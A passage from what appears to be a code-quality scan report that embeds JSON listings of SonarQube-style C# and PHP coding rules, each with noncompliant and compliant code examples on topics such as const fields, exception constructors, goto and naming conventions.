<code>const<\/code> field is calculated at compile\ntime, which improves performance.<\/p>\n<p>This rule raises an issue when a <code>static readonly<\/code> field is initialiazed with a value that is computable at compile time.<\/p>\n<p>As specified by Microsoft, the list of types that can have a constant value are:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>C# type<\/th>\n      <th>.Net Fwk type<\/th>\n    <\/tr>\n    <tr>\n      <td>bool<\/td>\n      <td>System.Boolean<\/td>\n    <\/tr>\n    <tr>\n      <td>byte<\/td>\n      <td>System.Byte<\/td>\n    <\/tr>\n    <tr>\n      <td>sbyte<\/td>\n      
<td>System.SByte<\/td>\n    <\/tr>\n    <tr>\n      <td>char<\/td>\n      <td>System.Char<\/td>\n    <\/tr>\n    <tr>\n      <td>decimal<\/td>\n      <td>System.Decimal<\/td>\n    <\/tr>\n    <tr>\n      <td>double<\/td>\n      <td>System.Double<\/td>\n    <\/tr>\n    <tr>\n      <td>float<\/td>\n      <td>System.Single<\/td>\n    <\/tr>\n    <tr>\n      <td>int<\/td>\n      <td>System.Int32<\/td>\n    <\/tr>\n    <tr>\n      <td>uint<\/td>\n      <td>System.UInt32<\/td>\n    <\/tr>\n    <tr>\n      <td>long<\/td>\n      <td>System.Int64<\/td>\n    <\/tr>\n    <tr>\n      <td>ulong<\/td>\n      <td>System.UInt64<\/td>\n    <\/tr>\n    <tr>\n      <td>short<\/td>\n      <td>System.Int16<\/td>\n    <\/tr>\n    <tr>\n      <td>ushort<\/td>\n      <td>System.UInt16<\/td>\n    <\/tr>\n    <tr>\n      <td>string<\/td>\n      <td>System.String<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnamespace myLib\n{\n  public class Foo\n  {\n    static readonly int x = 1;  \/\/ Noncompliant\n    static readonly int y = x + 4; \/\/ Noncompliant\n    static readonly string s = \"Bar\";  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace myLib\n{\n  public class Foo\n  {\n    const int x = 1;\n    const int y = x + 4;\n    const string s = \"Bar\";\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3963","repo":"csharpsquid","name":"\"static\" fields should be initialized inline","htmlDesc":"<p>When a <code>static<\/code> constructor serves no other purpose that initializing <code>static<\/code> fields, it comes with an unnecessary\nperformance cost because the compiler generates a check before each <code>static<\/code> method or instance constructor invocation.<\/p>\n<p>Instead, inline initialization is highly recommended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnamespace myLib\n{\n  public class Foo\n  {\n    static int i;\n    
static string s;\n\n    static Foo() \/\/ Noncompliant\n    {\n      i = 3;\n      ResourceManager sm =  new ResourceManager(\"strings\", Assembly.GetExecutingAssembly());\n      s = sm.GetString(\"mystring\");\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace myLib\n{\n  public class Foo\n  {\n    static int i =3;\n    static string s = InitString();\n\n    static string InitString()\n    {\n      ResourceManager sm = new ResourceManager(\"strings\", Assembly.GetExecutingAssembly());\n      return sm.GetString(\"mystring\");\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S3981","repo":"csharpsquid","name":"Collection sizes and array length comparisons should make sense","htmlDesc":"<p>The size of a collection and the length of an array are always greater than or equal to zero. So testing that a size or length is greater than or\nequal to zero doesn't make sense, since the result is always <code>true<\/code>. Similarly testing that it is less than zero will always return\n<code>false<\/code>. Perhaps the intent was to check the non-emptiness of the collection or array instead. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(collection.Count &gt;= 0){...}\n\nif(enumerable.Count() &lt; 0){...}\n\nif(array.Length &gt;= 0){...}\n\nbool result = array.Length &gt;=0;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S3984","repo":"csharpsquid","name":"Exception should not be created without being thrown","htmlDesc":"<p>Creating a new <code>Exception<\/code> without actually throwing it is useless and is probably due to a mistake.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x &lt; 0)\n{\n  new ArgumentException(\"x must be nonnegative\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x &lt; 0)\n{\n  throw new ArgumentException(\"x must be nonnegative\");\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S4005","repo":"csharpsquid","name":"\"System.Uri\" arguments should be used instead of strings","htmlDesc":"<p>String representations of URIs or URLs are prone to parsing and encoding errors which can lead to vulnerabilities. 
The <code>System.Uri<\/code>\nclass is a safe alternative and should be preferred.<\/p>\n<p>This rule raises an issue when a called method has a string parameter with a name containing \"uri\", \"Uri\", \"urn\", \"Urn\", \"url\" or \"Url\" and the\ndeclaring type contains a corresponding overload that takes a <code>System.Uri<\/code> as a parameter.<\/p>\n<p>When there is a choice between two overloads that differ only regarding the representation of a URI, the user should choose the overload that takes\na <code>System.Uri<\/code> argument.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n   public class Foo\n   {\n      public void FetchResource(string uriString) { }\n      public void FetchResource(Uri uri) { }\n\n      public string ReadResource(string uriString, string name, bool isLocal) { }\n      public string ReadResource(Uri uri, string name, bool isLocal) { }\n\n      public void Main() {\n        FetchResource(\"http:\/\/www.mysite.com\"); \/\/ Noncompliant\n        ReadResource(\"http:\/\/www.mysite.com\", \"foo-resource\", true); \/\/ Noncompliant\n      }\n   }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n   public class Foo\n   {\n      public void FetchResource(string uriString) { }\n      public void FetchResource(Uri uri) { }\n\n      public string ReadResource(string uriString, string name, bool isLocal) { }\n      public string ReadResource(Uri uri, string name, bool isLocal) { }\n\n      public void Main() {\n        FetchResource(new Uri(\"http:\/\/www.mysite.com\"));\n        ReadResource(new Uri(\"http:\/\/www.mysite.com\"), \"foo-resource\", true);\n      }\n   }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S4019","repo":"csharpsquid","name":"Base class methods should not be hidden","htmlDesc":"<p>When a method in a derived class has the same name as a method in the base class but 
with a signature that only differs by types that are weakly\nderived (e.g. <code>object<\/code> vs <code>string<\/code>), the result is that the base method becomes hidden.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n  class Foo\n  {\n    internal void SomeMethod(string s1, string s2) { }\n  }\n\n  class Bar : Foo\n  {\n    internal void SomeMethod(string s1, object o2) { }  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n  class Foo\n  {\n    internal void SomeMethod(string s1, string s2) { }\n  }\n\n  class Bar : Foo\n  {\n    internal void SomeOtherMethod(string s1, object o2) { }\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S4027","repo":"csharpsquid","name":"Exceptions should provide standard constructors","htmlDesc":"<p>Exceptions types should provide the following constructors:<\/p>\n<ul>\n  <li> <code>public MyException()<\/code> <\/li>\n  <li> <code>public MyException(string)<\/code> <\/li>\n  <li> <code>public MyException(string, Exception)<\/code> <\/li>\n  <li> <code>protected<\/code> or <code>private MyException(SerializationInfo, StreamingContext)<\/code> <\/li>\n<\/ul>\n<p>That fourth constructor should be <code>protected<\/code> in unsealed classes, and <code>private<\/code> in sealed classes.<\/p>\n<p>Not having this full set of constructors can make it difficult to handle exceptions.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nusing System;\n\nnamespace MyLibrary\n{\n  public class MyException \/\/ Noncompliant: several constructors are missing\n  {\n    public MyException()\n    {\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nusing System;\nusing System.Runtime.Serialization;\n\nnamespace MyLibrary\n{\n  public class MyException : Exception\n  {\n      public MyException()\n      {\n      }\n\n      public MyException(string message)\n     
     :base(message)\n      {\n      }\n\n      public MyException(string message, Exception innerException)\n          : base(message, innerException)\n      {\n      }\n\n      protected MyException(SerializationInfo info, StreamingContext context)\n          : base(info, context)\n      {\n      }\n  }\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S907","repo":"csharpsquid","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"}],"language":"cs","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/cs.html by fixme

      BUG found
      Open

              window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. 
Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  if (condition2) {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 &amp;&amp; condition2) {\n  ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and 
<code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 &amp;&amp; $condition2) || ($condition3 &amp;&amp; $condition4)) &amp;&amp; $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) &amp;&amp; my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n  private $foo = 4;                       \/\/foo is unused\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 
parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 42; $i++){}  \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n  <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n  <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  ;                                              \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n  echo $p;;                                      \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i &lt;= 10; doSomething($i), $i++);   \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n  echo $p;\n\n  for ($i = 1; $i &lt;= 10; $i++) {\n    doSomething($i);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n  the first character following the null statement is a white-space character. 
<\/li>\n  <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n  that the first character following the null statement is a white-space character. <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n  or while condition <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n  or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the same name as class fields","htmlDesc":"<p>Shadowing fields with a local variable is a bad practice that reduces code readability: it makes it confusing to know whether the field or the\nvariable is being used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n  public $myField;\n\n  public function doSomething() {\n    $myField = 0;\n    ...\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/2ADEAw\">CERT, DCL51-J.<\/a> - Do not shadow or obscure identifiers in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S112","repo":"php","name":"Generic exceptions ErrorException, RuntimeException and Exception should not be thrown","htmlDesc":"<p>If you throw a general exception type, such as ErrorException, RuntimeException, or Exception in a 
library or framework, it forces consumers to\ncatch all exceptions, including unknown exceptions that they do not know how to handle.<\/p>\n<p>Instead, either throw a subtype that already exists in the Standard PHP Library, or create your own type that derives from Exception.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthrow new Exception();  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nthrow new InvalidArgumentException();\n\/\/ or\nthrow new UnexpectedValueException();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/397.html\">MITRE, CWE-397<\/a> - Declaration of Throws for Generic Exception <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/BoB3AQ\">CERT, ERR07-J.<\/a> - Do not throw RuntimeException, Exception, or Throwable\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1124","repo":"php","name":"Modifiers should be declared in the correct order","htmlDesc":"<p>The PSR2 standard recommends listing modifiers in the following order to improve the readability of PHP source code:<\/p>\n<ol>\n  <li> final or abstract <\/li>\n  <li> public or protected or private <\/li>\n  <li> static <\/li>\n<\/ol>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstatic protected $foo;\n...\npublic static final function bar(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprotected static $foo;\n...\nfinal public static function bar(){...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1125","repo":"php","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($booleanVariable == true) { \/* ... *\/ }\nif ($booleanVariable != true) { \/* ... *\/ }\nif ($booleanVariable || false) { \/* ... 
*\/ }\ndoSomething(!false);\n\n$booleanVariable = condition ? true : exp;\n$booleanVariable = condition ? false : exp;\n$booleanVariable = condition ?  exp : true;\n$booleanVariable = condition ?  exp : false;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($booleanVariable) { \/* ... *\/ }\nif (!$booleanVariable) { \/* ... *\/ }\nif ($booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n\n$booleanVariable = condition || exp;\n$booleanVariable = !condition &amp;&amp; exp;\n$booleanVariable = !condition ||  exp;\n$booleanVariable = condition &amp;&amp; exp;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1126","repo":"php","name":"Return of boolean expressions should not be wrapped into an \"if-then-else\" statement","htmlDesc":"<p>Return of boolean literal statements wrapped into <code>if-then-else<\/code> ones should be simplified.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn expression;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S113","repo":"php","name":"Files should contain an empty new line at the end","htmlDesc":"<p>Some tools such as Git work better when files end with an empty line.<\/p>\n<p>This rule simply generates an issue if it is missing.<\/p>\n<p>For example, a Git diff looks like this if the empty line is missing at the end of the file:<\/p>\n<pre>\n+class Test {\n+}\n\\ No newline at end of file\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1131","repo":"php","name":"Lines should not end with trailing whitespaces","htmlDesc":"<p>Trailing whitespaces are simply useless and should not stay 
in code. They may generate noise when comparing different versions of the same\nfile.<\/p>\n<p>If you encounter issues from this rule, this probably means that you are not using an automated code formatter - which you should if you have the\nopportunity to do so. <\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1134","repo":"php","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide($numerator, $denominator) {\n  return $numerator \/ $denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1135","repo":"php","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S114","repo":"php","name":"Interface names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all\ninterface names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\ninterface myInterface {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ninterface MyInterface {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the interface names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1142","repo":"php","name":"Functions should not contain too many return statements","htmlDesc":"<p>Having too many return statements in a function increases the function's essential complexity because the flow of execution is broken each time a\nreturn statement is encountered. 
This makes it harder to read and understand the logic of the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction myFunction(){ \/\/ Noncompliant as there are 4 return statements\n  if (condition1) {\n    return true;\n  } else {\n    if (condition2) {\n      return false;\n    } else {\n      return true;\n    }\n  }\n  return false;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed return statements per function","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1144","repo":"php","name":"Unused \"private\" methods should be removed","htmlDesc":"<p><code>private<\/code> methods that are never executed are dead code: unnecessary, inoperative code that should be removed. Cleaning out dead code\ndecreases the size of the maintained codebase, making it easier to understand the program and preventing bugs from being introduced.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo() {}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n    ...\n  }\n\n  private function unusedPrivateFunction() {  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo\n{\n  private function Foo(){}   \/\/ Compliant, private empty constructor intentionally used to prevent any direct instantiation of a class.\n\n  public static function doSomething()\n  {\n    $foo = new Foo();\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and 